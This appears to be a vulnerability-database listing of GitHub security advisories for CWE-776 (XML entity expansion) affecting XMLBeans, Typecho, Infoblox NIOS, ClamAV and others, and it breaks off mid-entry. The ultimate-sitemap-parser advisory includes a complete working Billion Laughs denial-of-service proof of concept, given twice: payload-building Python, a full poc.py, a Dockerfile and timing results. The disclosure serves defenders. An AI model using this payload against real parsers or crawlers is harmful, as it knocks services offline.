Common Weakness Enumeration

CWE-776

Allowed

Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')

Abstraction: Base · Status: Draft

The product uses XML documents and allows their structure to be defined with a Document Type Definition (DTD), but it does not properly control the number of recursive definitions of entities.

142 vulnerabilities reference this CWE, most recent first.

GHSA-MW3R-PFMG-XP92

Vulnerability from github – Published: 2021-06-16 17:37 – Updated: 2021-10-21 18:58
VLAI
Summary
Improper Restriction of Recursive Entity References in Apache XMLBeans
Details

The XML parsers used by XMLBeans up to version 2.6.0 did not set the properties needed to protect the user from malicious XML input. Vulnerabilities include possibilities for XML Entity Expansion attacks. Affects XMLBeans up to and including v2.6.0.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.apache.xmlbeans:xmlbeans"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-23926"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-776"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-04-06T21:33:29Z",
    "nvd_published_at": "2021-01-14T15:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "The XML parsers used by XMLBeans up to version 2.6.0 did not set the properties needed to protect the user from malicious XML input. Vulnerabilities include possibilities for XML Entity Expansion attacks. Affects XMLBeans up to and including v2.6.0.",
  "id": "GHSA-mw3r-pfmg-xp92",
  "modified": "2021-10-21T18:58:58Z",
  "published": "2021-06-16T17:37:11Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23926"
    },
    {
      "type": "WEB",
      "url": "https://issues.apache.org/jira/browse/XMLBEANS-517"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r2dc5588009dc9f0310b7382269f932cc96cae4c3901b747dda1a7fed@%3Cjava-dev.axis.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/rbb01d10512098894cd5f22325588197532c64f1c818ea7e4120d40c1@%3Cjava-dev.axis.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00024.html"
    },
    {
      "type": "WEB",
      "url": "https://poi.apache.org"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20210513-0004"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpujul2022.html"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Improper Restriction of Recursive Entity References in Apache XMLBeans"
}

GHSA-MX48-CPPF-PVXC

Vulnerability from github – Published: 2023-12-07 18:30 – Updated: 2023-12-09 06:30
VLAI
Details

Typecho v1.2.1 was discovered to be vulnerable to an XML Quadratic Blowup attack via the component /index.php/action/xmlrpc.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-49967"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-776"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-12-07T16:15:07Z",
    "severity": "HIGH"
  },
  "details": "Typecho v1.2.1 was discovered to be vulnerable to an XML Quadratic Blowup attack via the component /index.php/action/xmlrpc.",
  "id": "GHSA-mx48-cppf-pvxc",
  "modified": "2023-12-09T06:30:20Z",
  "published": "2023-12-07T18:30:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49967"
    },
    {
      "type": "WEB",
      "url": "https://github.com/typecho/typecho/issues/1648"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-P5WC-9W9R-M232

Vulnerability from github – Published: 2026-06-19 21:15 – Updated: 2026-06-19 21:15
VLAI
Summary
Ultimate Sitemap Parser (USP): XML Entity Expansion (Billion Laughs) DoS in XMLSitemapParser
Details

XML Entity Expansion (Billion Laughs) DoS in XMLSitemapParser

Summary

ultimate-sitemap-parser version 1.8.0 and earlier parse attacker-controlled XML content using Python's xml.parsers.expat without any restriction on DTD declarations or recursive entity references. An attacker who can serve a malicious sitemap can trigger exponential XML entity expansion (the "Billion Laughs" attack), causing unbounded CPU and memory consumption in the victim process. No authentication, user interaction, or special configuration is required — the vulnerability is exploitable by default through any public-facing use of sitemap_tree_for_homepage() or sitemap_from_str().

Details

The vulnerable code path begins at the public API entry points and flows to the Expat XML parser without any sanitization:

  1. usp/tree.py:42sitemap_tree_for_homepage(homepage_url) is the primary public entry point.
  2. usp/tree.py:133sitemap_from_str(content) is the secondary public entry point (also directly reachable from user code).
  3. usp/fetch_parse.py:141-145SitemapFetcher._fetch() retrieves the remote URL content.
  4. usp/fetch_parse.py:175 — The raw response becomes response_content (taint propagation point).
  5. usp/fetch_parse.py:441-450XMLSitemapParser.sitemap() creates an Expat parser and feeds the attacker-controlled content directly to it:
# usp/fetch_parse.py:441-450  — VULNERABLE SINK
parser = xml.parsers.expat.ParserCreate(
    namespace_separator=self.__XML_NAMESPACE_SEPARATOR
)
# ... handler assignments ...
parser.Parse(self._content, is_final)   # <-- no DTD/entity restriction

A full audit of the usp/ directory confirms that none of the following hardening measures are present: - defusedxml usage - DOCTYPE rejection - SetParamEntityParsing - UseForeignDTD - ExternalEntityRefHandler

When a Billion Laughs payload is parsed, each nested entity reference is expanded recursively, multiplying the in-memory string by a factor of 10 per nesting level. At level 6 (10⁶ expansions), processing time exceeds 20 seconds, effectively hanging the calling process.

PoC

Environment setup:

# Option A: install from PyPI
python -m venv /tmp/usp-poc
. /tmp/usp-poc/bin/activate
pip install ultimate-sitemap-parser==1.8.0
# Option B: Docker (using the provided Dockerfile)
docker build -t vuln-001-usp -f vuln-001/Dockerfile .
docker run --rm vuln-001-usp

Attack payload and execution:

from usp.tree import sitemap_from_str
import time, signal

TIMEOUT = 20

class TimedOut(Exception): pass
def handler(s, f): raise TimedOut()

def build_payload(level):
    lines = ['<?xml version="1.0"?>', '<!DOCTYPE x [']
    lines.append(' <!ENTITY lol "lol">')
    for i in range(1, level + 1):
        prev = "lol" if i == 1 else f"lol{i-1}"
        expansion = "".join(f"&{prev};" for _ in range(10))
        lines.append(f' <!ENTITY lol{i} "{expansion}">')
    lines.append(']>')
    lines.append('<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">')
    lines.append(f'  <url><loc>http://example.com/&lol{level};</loc></url>')
    lines.append('</urlset>')
    return "\n".join(lines)

for level in [3, 4, 5, 6]:
    signal.signal(signal.SIGALRM, handler)
    signal.alarm(TIMEOUT)
    t = time.perf_counter()
    try:
        result = sitemap_from_str(build_payload(level))
        elapsed = time.perf_counter() - t
        signal.alarm(0)
        pages = list(result.all_pages())
        url_len = len(pages[0].url) if pages else 0
        print(f"Level {level}: {elapsed:.4f}s  url_len={url_len:,}")
    except TimedOut:
        elapsed = time.perf_counter() - t
        signal.alarm(0)
        print(f"Level {level}: TIMEOUT after {elapsed:.1f}s -- DoS confirmed")

Expected output (observed during dynamic reproduction):

Level 3 (10^3):   0.0054s   url_len=3,019
Level 4 (10^4):   0.0321s   url_len=30,019
Level 5 (10^5):   5.2845s   url_len=300,019
Level 6 (10^6):  TIMEOUT after 20.0011s  -- DoS confirmed

Processing time grows exponentially: level 5 is ~165× slower than level 4, and level 6 exceeds the 20-second watchdog. This conclusively demonstrates unbounded resource consumption.

Impact

This is a Denial-of-Service (DoS) vulnerability via XML Entity Expansion (the "Billion Laughs" / CWE-776 pattern). Any application or service that uses ultimate-sitemap-parser to crawl external or user-supplied URLs is impacted.

Who is affected: - Web crawlers and indexers that call sitemap_tree_for_homepage() against arbitrary URLs — a single malicious sitemap server can lock up the crawler process. - CI/CD pipelines and monitoring tools that periodically parse sitemaps as part of automated workflows. - Any application that passes unvalidated user input to sitemap_from_str().

Because no authentication, elevated privilege, or prior relationship is required (CVSS PR:N, UI:N), the attack surface is broad. An attacker only needs to operate a web server that returns a malicious sitemap when visited.

Reproduction artifacts

Dockerfile

FROM python:3.11-slim

LABEL description="VULN-001: XML Entity Expansion (Billion Laughs) DoS PoC" \
      target="GateNLP/ultimate-sitemap-parser <= 1.8.0" \
      cwe="CWE-776"

WORKDIR /app

# Copy the cloned repository first
COPY repo/ /app/repo/

# Install uv_build (required build backend) then install the vulnerable package from the local clone
RUN pip install --no-cache-dir "uv_build>=0.9.6,<0.10.0" && \
    pip install --no-cache-dir /app/repo/

# Copy the PoC script
COPY vuln-001/poc.py /app/poc.py

CMD ["python3", "-u", "/app/poc.py"]

poc.py

#!/usr/bin/env python3
"""
PoC for VULN-001: XML Entity Expansion (Billion Laughs) DoS
Affected: GateNLP/ultimate-sitemap-parser <= 1.8.0
CWE-776: Improper Restriction of Recursive Entity References in DTDs
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (7.5 High)

Sink: usp/fetch_parse.py:450
  parser = xml.parsers.expat.ParserCreate(namespace_separator=...)
  parser.Parse(self._content, is_final)   <- no DTD/entity restriction

Entry: usp.tree.sitemap_from_str(content: str) -> AbstractSitemap
"""

import signal
import sys
import time

from usp.tree import sitemap_from_str

TIMEOUT_SECONDS = 20
DOS_THRESHOLD_SECONDS = 2.0  # level 5 must exceed this to PASS


class TimedOut(Exception):
    pass


def _alarm_handler(signum, frame):
    raise TimedOut("SIGALRM fired")


def build_billion_laughs_payload(level: int) -> str:
    """Build a Billion Laughs XML payload nested to `level` depth.

    Each level multiplies expansion by 10:
      level 3 -> 10^3   = 1,000 chars
      level 4 -> 10^4   = 10,000 chars
      level 5 -> 10^5   = 100,000 chars
      level 6 -> 10^6   = 1,000,000 chars
    """
    lines = ['<?xml version="1.0"?>', "<!DOCTYPE x ["]
    lines.append(' <!ENTITY lol "lol">')
    for i in range(1, level + 1):
        prev = "lol" if i == 1 else f"lol{i - 1}"
        expansion = "".join(f"&{prev};" for _ in range(10))
        lines.append(f' <!ENTITY lol{i} "{expansion}">')
    lines.append("]>")
    lines.append('<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">')
    lines.append(f"  <url><loc>http://example.com/&lol{level};</loc></url>")
    lines.append("</urlset>")
    return "\n".join(lines)


def parse_with_timeout(payload: str):
    """Parse payload under SIGALRM watchdog; return (elapsed, url_len, timed_out)."""
    signal.signal(signal.SIGALRM, _alarm_handler)
    signal.alarm(TIMEOUT_SECONDS)
    start = time.perf_counter()
    timed_out = False
    url_len = 0
    try:
        result = sitemap_from_str(payload)
        elapsed = time.perf_counter() - start
        signal.alarm(0)
        pages = list(result.all_pages())
        if pages:
            url_len = len(pages[0].url)
    except TimedOut:
        elapsed = time.perf_counter() - start
        timed_out = True
        signal.alarm(0)
    except Exception as exc:
        elapsed = time.perf_counter() - start
        signal.alarm(0)
        print(f"    [EXCEPTION] {type(exc).__name__}: {exc}", flush=True)
    return elapsed, url_len, timed_out


def main() -> int:
    print("=" * 64)
    print("VULN-001  XML Entity Expansion DoS  (Billion Laughs)")
    print("Target : GateNLP/ultimate-sitemap-parser <= 1.8.0")
    print("Sink   : usp/fetch_parse.py:450  parser.Parse(_content)")
    print(f"Timeout: {TIMEOUT_SECONDS}s per level")
    print("=" * 64)

    results = {}
    for level in [3, 4, 5, 6]:
        theoretical = 10**level
        payload = build_billion_laughs_payload(level)
        print(
            f"\n[*] Level {level}: 10^{level} = {theoretical:>10,} chars  "
            f"payload_bytes={len(payload)}",
            flush=True,
        )
        elapsed, url_len, timed_out = parse_with_timeout(payload)
        results[level] = (elapsed, url_len, timed_out)

        if timed_out:
            print(
                f"[!] Level {level}: TIMED OUT after {elapsed:.1f}s  "
                f"(>{TIMEOUT_SECONDS}s)  -- DoS confirmed",
                flush=True,
            )
        else:
            print(
                f"[+] Level {level}: completed in {elapsed:.4f}s  "
                f"url_len={url_len:,}",
                flush=True,
            )

    print("\n" + "=" * 64)
    print("TIMING SUMMARY")
    print("=" * 64)
    for lvl, (elapsed, url_len, timed_out) in results.items():
        status = f"TIMEOUT >{TIMEOUT_SECONDS}s" if timed_out else f"{elapsed:.4f}s"
        print(f"  Level {lvl} (10^{lvl:>1}): {status:>20}   url_len={url_len:,}")

    print()

    # Verdict: level 5 must take >2s or level 6 must time out
    lvl5_elapsed, _, lvl5_timed_out = results.get(5, (0, 0, False))
    lvl6_elapsed, _, lvl6_timed_out = results.get(6, (0, 0, False))

    slow_evidence = lvl5_elapsed > DOS_THRESHOLD_SECONDS or lvl5_timed_out
    timeout_evidence = lvl6_timed_out or lvl6_elapsed > DOS_THRESHOLD_SECONDS

    if slow_evidence or timeout_evidence:
        print("[PASS] DoS CONFIRMED: exponential CPU exhaustion via XML entity expansion")
        print(
            f"       level-5 time={lvl5_elapsed:.4f}s  level-6 "
            + ("TIMEOUT" if lvl6_timed_out else f"time={lvl6_elapsed:.4f}s")
        )
        print("[PASS] CWE-776 Billion Laughs confirmed in ultimate-sitemap-parser <= 1.8.0")
        return 0
    else:
        print("[FAIL] Timing did not show significant slowdown -- DoS not confirmed")
        print(f"       level-5={lvl5_elapsed:.4f}s  level-6={lvl6_elapsed:.4f}s")
        print("       (expected level-5 > 2s or level-6 to time out)")
        return 1


if __name__ == "__main__":
    sys.exit(main())
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.8.0"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "ultimate-sitemap-parser"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.8.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-776"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-19T21:15:36Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## XML Entity Expansion (Billion Laughs) DoS in XMLSitemapParser\n\n### Summary\n\n`ultimate-sitemap-parser` version 1.8.0 and earlier parse attacker-controlled XML content using Python\u0027s `xml.parsers.expat` without any restriction on DTD declarations or recursive entity references. An attacker who can serve a malicious sitemap can trigger exponential XML entity expansion (the \"Billion Laughs\" attack), causing unbounded CPU and memory consumption in the victim process. No authentication, user interaction, or special configuration is required \u2014 the vulnerability is exploitable by default through any public-facing use of `sitemap_tree_for_homepage()` or `sitemap_from_str()`.\n\n### Details\n\nThe vulnerable code path begins at the public API entry points and flows to the Expat XML parser without any sanitization:\n\n1. **`usp/tree.py:42`** \u2014 `sitemap_tree_for_homepage(homepage_url)` is the primary public entry point.\n2. **`usp/tree.py:133`** \u2014 `sitemap_from_str(content)` is the secondary public entry point (also directly reachable from user code).\n3. **`usp/fetch_parse.py:141-145`** \u2014 `SitemapFetcher._fetch()` retrieves the remote URL content.\n4. **`usp/fetch_parse.py:175`** \u2014 The raw response becomes `response_content` (taint propagation point).\n5. **`usp/fetch_parse.py:441-450`** \u2014 `XMLSitemapParser.sitemap()` creates an Expat parser and feeds the attacker-controlled content directly to it:\n\n```python\n# usp/fetch_parse.py:441-450  \u2014 VULNERABLE SINK\nparser = xml.parsers.expat.ParserCreate(\n    namespace_separator=self.__XML_NAMESPACE_SEPARATOR\n)\n# ... handler assignments ...\nparser.Parse(self._content, is_final)   # \u003c-- no DTD/entity restriction\n```\n\nA full audit of the `usp/` directory confirms that none of the following hardening measures are present:\n- `defusedxml` usage\n- DOCTYPE rejection\n- `SetParamEntityParsing`\n- `UseForeignDTD`\n- `ExternalEntityRefHandler`\n\nWhen a Billion Laughs payload is parsed, each nested entity reference is expanded recursively, multiplying the in-memory string by a factor of 10 per nesting level. At level 6 (10\u2076 expansions), processing time exceeds 20 seconds, effectively hanging the calling process.\n\n### PoC\n\n**Environment setup:**\n\n```bash\n# Option A: install from PyPI\npython -m venv /tmp/usp-poc\n. /tmp/usp-poc/bin/activate\npip install ultimate-sitemap-parser==1.8.0\n```\n\n```bash\n# Option B: Docker (using the provided Dockerfile)\ndocker build -t vuln-001-usp -f vuln-001/Dockerfile .\ndocker run --rm vuln-001-usp\n```\n\n**Attack payload and execution:**\n\n```python\nfrom usp.tree import sitemap_from_str\nimport time, signal\n\nTIMEOUT = 20\n\nclass TimedOut(Exception): pass\ndef handler(s, f): raise TimedOut()\n\ndef build_payload(level):\n    lines = [\u0027\u003c?xml version=\"1.0\"?\u003e\u0027, \u0027\u003c!DOCTYPE x [\u0027]\n    lines.append(\u0027 \u003c!ENTITY lol \"lol\"\u003e\u0027)\n    for i in range(1, level + 1):\n        prev = \"lol\" if i == 1 else f\"lol{i-1}\"\n        expansion = \"\".join(f\"\u0026{prev};\" for _ in range(10))\n        lines.append(f\u0027 \u003c!ENTITY lol{i} \"{expansion}\"\u003e\u0027)\n    lines.append(\u0027]\u003e\u0027)\n    lines.append(\u0027\u003curlset xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\"\u003e\u0027)\n    lines.append(f\u0027  \u003curl\u003e\u003cloc\u003ehttp://example.com/\u0026lol{level};\u003c/loc\u003e\u003c/url\u003e\u0027)\n    lines.append(\u0027\u003c/urlset\u003e\u0027)\n    return \"\\n\".join(lines)\n\nfor level in [3, 4, 5, 6]:\n    signal.signal(signal.SIGALRM, handler)\n    signal.alarm(TIMEOUT)\n    t = time.perf_counter()\n    try:\n        result = sitemap_from_str(build_payload(level))\n        elapsed = time.perf_counter() - t\n        signal.alarm(0)\n        pages = list(result.all_pages())\n        url_len = len(pages[0].url) if pages else 0\n        print(f\"Level {level}: {elapsed:.4f}s  url_len={url_len:,}\")\n    except TimedOut:\n        elapsed = time.perf_counter() - t\n        signal.alarm(0)\n        print(f\"Level {level}: TIMEOUT after {elapsed:.1f}s -- DoS confirmed\")\n```\n\n**Expected output (observed during dynamic reproduction):**\n\n```\nLevel 3 (10^3):   0.0054s   url_len=3,019\nLevel 4 (10^4):   0.0321s   url_len=30,019\nLevel 5 (10^5):   5.2845s   url_len=300,019\nLevel 6 (10^6):  TIMEOUT after 20.0011s  -- DoS confirmed\n```\n\nProcessing time grows exponentially: level 5 is ~165\u00d7 slower than level 4, and level 6 exceeds the 20-second watchdog. This conclusively demonstrates unbounded resource consumption.\n\n### Impact\n\nThis is a **Denial-of-Service (DoS)** vulnerability via XML Entity Expansion (the \"Billion Laughs\" / CWE-776 pattern). Any application or service that uses `ultimate-sitemap-parser` to crawl external or user-supplied URLs is impacted.\n\n**Who is affected:**\n- **Web crawlers and indexers** that call `sitemap_tree_for_homepage()` against arbitrary URLs \u2014 a single malicious sitemap server can lock up the crawler process.\n- **CI/CD pipelines and monitoring tools** that periodically parse sitemaps as part of automated workflows.\n- **Any application** that passes unvalidated user input to `sitemap_from_str()`.\n\nBecause no authentication, elevated privilege, or prior relationship is required (CVSS PR:N, UI:N), the attack surface is broad. An attacker only needs to operate a web server that returns a malicious sitemap when visited.\n\n### Reproduction artifacts\n\n#### `Dockerfile`\n\n```dockerfile\nFROM python:3.11-slim\n\nLABEL description=\"VULN-001: XML Entity Expansion (Billion Laughs) DoS PoC\" \\\n      target=\"GateNLP/ultimate-sitemap-parser \u003c= 1.8.0\" \\\n      cwe=\"CWE-776\"\n\nWORKDIR /app\n\n# Copy the cloned repository first\nCOPY repo/ /app/repo/\n\n# Install uv_build (required build backend) then install the vulnerable package from the local clone\nRUN pip install --no-cache-dir \"uv_build\u003e=0.9.6,\u003c0.10.0\" \u0026\u0026 \\\n    pip install --no-cache-dir /app/repo/\n\n# Copy the PoC script\nCOPY vuln-001/poc.py /app/poc.py\n\nCMD [\"python3\", \"-u\", \"/app/poc.py\"]\n```\n\n#### `poc.py`\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nPoC for VULN-001: XML Entity Expansion (Billion Laughs) DoS\nAffected: GateNLP/ultimate-sitemap-parser \u003c= 1.8.0\nCWE-776: Improper Restriction of Recursive Entity References in DTDs\nCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (7.5 High)\n\nSink: usp/fetch_parse.py:450\n  parser = xml.parsers.expat.ParserCreate(namespace_separator=...)\n  parser.Parse(self._content, is_final)   \u003c- no DTD/entity restriction\n\nEntry: usp.tree.sitemap_from_str(content: str) -\u003e AbstractSitemap\n\"\"\"\n\nimport signal\nimport sys\nimport time\n\nfrom usp.tree import sitemap_from_str\n\nTIMEOUT_SECONDS = 20\nDOS_THRESHOLD_SECONDS = 2.0  # level 5 must exceed this to PASS\n\n\nclass TimedOut(Exception):\n    pass\n\n\ndef _alarm_handler(signum, frame):\n    raise TimedOut(\"SIGALRM fired\")\n\n\ndef build_billion_laughs_payload(level: int) -\u003e str:\n    \"\"\"Build a Billion Laughs XML payload nested to `level` depth.\n\n    Each level multiplies expansion by 10:\n      level 3 -\u003e 10^3   = 1,000 chars\n      level 4 -\u003e 10^4   = 10,000 chars\n      level 5 -\u003e 10^5   = 100,000 chars\n      level 6 -\u003e 10^6   = 1,000,000 chars\n    \"\"\"\n    lines = [\u0027\u003c?xml version=\"1.0\"?\u003e\u0027, \"\u003c!DOCTYPE x [\"]\n    lines.append(\u0027 \u003c!ENTITY lol \"lol\"\u003e\u0027)\n    for i in range(1, level + 1):\n        prev = \"lol\" if i == 1 else f\"lol{i - 1}\"\n        expansion = \"\".join(f\"\u0026{prev};\" for _ in range(10))\n        lines.append(f\u0027 \u003c!ENTITY lol{i} \"{expansion}\"\u003e\u0027)\n    lines.append(\"]\u003e\")\n    lines.append(\u0027\u003curlset xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\"\u003e\u0027)\n    lines.append(f\"  \u003curl\u003e\u003cloc\u003ehttp://example.com/\u0026lol{level};\u003c/loc\u003e\u003c/url\u003e\")\n    lines.append(\"\u003c/urlset\u003e\")\n    return \"\\n\".join(lines)\n\n\ndef parse_with_timeout(payload: str):\n    \"\"\"Parse payload under SIGALRM watchdog; return (elapsed, url_len, timed_out).\"\"\"\n    signal.signal(signal.SIGALRM, _alarm_handler)\n    signal.alarm(TIMEOUT_SECONDS)\n    start = time.perf_counter()\n    timed_out = False\n    url_len = 0\n    try:\n        result = sitemap_from_str(payload)\n        elapsed = time.perf_counter() - start\n        signal.alarm(0)\n        pages = list(result.all_pages())\n        if pages:\n            url_len = len(pages[0].url)\n    except TimedOut:\n        elapsed = time.perf_counter() - start\n        timed_out = True\n        signal.alarm(0)\n    except Exception as exc:\n        elapsed = time.perf_counter() - start\n        signal.alarm(0)\n        print(f\"    [EXCEPTION] {type(exc).__name__}: {exc}\", flush=True)\n    return elapsed, url_len, timed_out\n\n\ndef main() -\u003e int:\n    print(\"=\" * 64)\n    print(\"VULN-001  XML Entity Expansion DoS  (Billion Laughs)\")\n    print(\"Target : GateNLP/ultimate-sitemap-parser \u003c= 1.8.0\")\n    print(\"Sink   : usp/fetch_parse.py:450  parser.Parse(_content)\")\n    print(f\"Timeout: {TIMEOUT_SECONDS}s per level\")\n    print(\"=\" * 64)\n\n    results = {}\n    for level in [3, 4, 5, 6]:\n        theoretical = 10**level\n        payload = build_billion_laughs_payload(level)\n        print(\n            f\"\\n[*] Level {level}: 10^{level} = {theoretical:\u003e10,} chars  \"\n            f\"payload_bytes={len(payload)}\",\n            flush=True,\n        )\n        elapsed, url_len, timed_out = parse_with_timeout(payload)\n        results[level] = (elapsed, url_len, timed_out)\n\n        if timed_out:\n            print(\n                f\"[!] Level {level}: TIMED OUT after {elapsed:.1f}s  \"\n                f\"(\u003e{TIMEOUT_SECONDS}s)  -- DoS confirmed\",\n                flush=True,\n            )\n        else:\n            print(\n                f\"[+] Level {level}: completed in {elapsed:.4f}s  \"\n                f\"url_len={url_len:,}\",\n                flush=True,\n            )\n\n    print(\"\\n\" + \"=\" * 64)\n    print(\"TIMING SUMMARY\")\n    print(\"=\" * 64)\n    for lvl, (elapsed, url_len, timed_out) in results.items():\n        status = f\"TIMEOUT \u003e{TIMEOUT_SECONDS}s\" if timed_out else f\"{elapsed:.4f}s\"\n        print(f\"  Level {lvl} (10^{lvl:\u003e1}): {status:\u003e20}   url_len={url_len:,}\")\n\n    print()\n\n    # Verdict: level 5 must take \u003e2s or level 6 must time out\n    lvl5_elapsed, _, lvl5_timed_out = results.get(5, (0, 0, False))\n    lvl6_elapsed, _, lvl6_timed_out = results.get(6, (0, 0, False))\n\n    slow_evidence = lvl5_elapsed \u003e DOS_THRESHOLD_SECONDS or lvl5_timed_out\n    timeout_evidence = lvl6_timed_out or lvl6_elapsed \u003e DOS_THRESHOLD_SECONDS\n\n    if slow_evidence or timeout_evidence:\n        print(\"[PASS] DoS CONFIRMED: exponential CPU exhaustion via XML entity expansion\")\n        print(\n            f\"       level-5 time={lvl5_elapsed:.4f}s  level-6 \"\n            + (\"TIMEOUT\" if lvl6_timed_out else f\"time={lvl6_elapsed:.4f}s\")\n        )\n        print(\"[PASS] CWE-776 Billion Laughs confirmed in ultimate-sitemap-parser \u003c= 1.8.0\")\n        return 0\n    else:\n        print(\"[FAIL] Timing did not show significant slowdown -- DoS not confirmed\")\n        print(f\"       level-5={lvl5_elapsed:.4f}s  level-6={lvl6_elapsed:.4f}s\")\n        print(\"       (expected level-5 \u003e 2s or level-6 to time out)\")\n        return 1\n\n\nif __name__ == \"__main__\":\n    sys.exit(main())\n```",
  "id": "GHSA-p5wc-9w9r-m232",
  "modified": "2026-06-19T21:15:36Z",
  "published": "2026-06-19T21:15:36Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/GateNLP/ultimate-sitemap-parser/security/advisories/GHSA-p5wc-9w9r-m232"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/GateNLP/ultimate-sitemap-parser"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Ultimate Sitemap Parser (USP): XML Entity Expansion (Billion Laughs) DoS in XMLSitemapParser"
}

GHSA-P9HM-FGJ4-CW8W

Vulnerability from github – Published: 2022-05-24 19:06 – Updated: 2022-05-24 19:06
VLAI
Details

Infoblox NIOS before 8.5.2 allows entity expansion during an XML upload operation, a related issue to CVE-2003-1564.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-15303"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-776"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-06-28T13:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Infoblox NIOS before 8.5.2 allows entity expansion during an XML upload operation, a related issue to CVE-2003-1564.",
  "id": "GHSA-p9hm-fgj4-cw8w",
  "modified": "2022-05-24T19:06:27Z",
  "published": "2022-05-24T19:06:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15303"
    },
    {
      "type": "WEB",
      "url": "https://community.infoblox.com/t5/Security/NIOS-XML-Vulnerability/m-p/22437#M1995"
    },
    {
      "type": "WEB",
      "url": "https://www.infoblox.com/products/nios8"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-PCR4-7R58-755H

Vulnerability from github – Published: 2023-03-01 09:30 – Updated: 2023-03-13 15:30
VLAI
Details

On Feb 15, 2023, the following vulnerability in the ClamAV scanning library was disclosed: A vulnerability in the DMG file parser of ClamAV versions 1.0.0 and earlier, 0.105.1 and earlier, and 0.103.7 and earlier could allow an unauthenticated, remote attacker to access sensitive information on an affected device. This vulnerability is due to enabling XML entity substitution that may result in XML external entity injection. An attacker could exploit this vulnerability by submitting a crafted DMG file to be scanned by ClamAV on an affected device. A successful exploit could allow the attacker to leak bytes from any file that may be read by the ClamAV scanning process.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-20052"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611",
      "CWE-776"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-03-01T08:15:00Z",
    "severity": "MODERATE"
  },
  "details": "On Feb 15, 2023, the following vulnerability in the ClamAV scanning library was disclosed: A vulnerability in the DMG file parser of ClamAV versions 1.0.0 and earlier, 0.105.1 and earlier, and 0.103.7 and earlier could allow an unauthenticated, remote attacker to access sensitive information on an affected device. This vulnerability is due to enabling XML entity substitution that may result in XML external entity injection. An attacker could exploit this vulnerability by submitting a crafted DMG file to be scanned by ClamAV on an affected device. A successful exploit could allow the attacker to leak bytes from any file that may be read by the ClamAV scanning process.",
  "id": "GHSA-pcr4-7r58-755h",
  "modified": "2023-03-13T15:30:19Z",
  "published": "2023-03-01T09:30:29Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-20052"
    },
    {
      "type": "WEB",
      "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-clamav-xxe-TcSZduhN"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/202310-01"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-PM3H-MM62-PWM8

Vulnerability from github – Published: 2022-03-11 00:02 – Updated: 2022-03-28 15:56
VLAI
Summary
XML Entity Expansion in trytond and proteus
Details

